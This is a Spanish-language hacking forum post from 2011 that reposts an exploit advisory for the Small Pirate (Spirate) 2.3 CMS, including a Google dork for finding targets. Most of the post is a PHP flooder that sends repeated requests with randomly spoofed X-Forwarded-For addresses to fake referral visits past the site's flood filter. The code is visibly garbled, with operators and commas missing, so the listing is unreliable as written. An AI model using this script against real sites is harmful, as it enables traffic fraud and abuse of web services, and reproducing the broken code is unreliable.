send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Small Pirate <= 2.3 Incorrect Flood Filter Headers

  • 0 Respuestas
  • 1484 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Agosto 27, 2011, 05:33:04 pm »
# Exploit Title: Small Pirate <= 2.3 Incorrect Flood Filter Headers
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: You are not allowed to view links. Register or Login
# Software Link: You are not allowed to view links. Register or Login
# Tested on: Linux

[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR y en especial a mi madre.

This vulnerability takes advantage of randomly generated headers and thus generating false origin falsifies visits

[PoC]
Código: You are not allowed to view links. Register or Login
<?php
//////config//////////////
$flood 0;
$host "domain.com";
$path "/indexphp?referredby=[id]"// change id!!
////////////////////////////////

////////FLOODER////////////////
while ( $flood 1000) {
$rangoip1 rand(1,254);
$rangoip2 rand(1,254);
$rangoip3 rand(1,254);
$rangoip4 rand(1,254);
$ipgenerada $rangoip1.".".$rangoip2.".".$rangoip3.".".$rangoip4;
$da fsockopen($host80$errno$errstr30);
if (!
$da) {
echo 
"$errstr ($errno)\n";
} else {
$salida "GET http://".$host."$path HTTP/1.1\r\n";
$salida .= "Host: ".$host."\r\n";
$salida .= "X-Forwarded-For: $ipgenerada\r\n";
$salida .= "Via: CB-Prx\r\n";
$salida .= "Connection: Close\r\n\r\n";
fwrite($da$salida);
fclose($da);
$flood++;
}
echo 
"Flooded a $host$path exitoso con la ip $ipgenerada<br>";
}
?>


 

¿Te gustó el post? COMPARTILO!



Joomla 0-Day - HTTP Headers Remote Code Execution - CVE-2015-8562

Iniciado por Franciscodc

Respuestas: 0
Vistas: 2429
Último mensaje Diciembre 26, 2015, 05:10:59 am
por Franciscodc
Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC

Iniciado por hielasangre

Respuestas: 0
Vistas: 1570
Último mensaje Agosto 27, 2011, 05:33:54 pm
por hielasangre